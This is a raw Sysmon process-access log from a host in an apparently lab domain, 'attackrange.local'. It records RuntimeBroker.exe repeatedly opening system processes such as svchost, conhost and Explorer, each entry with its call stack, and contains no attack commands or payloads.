13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 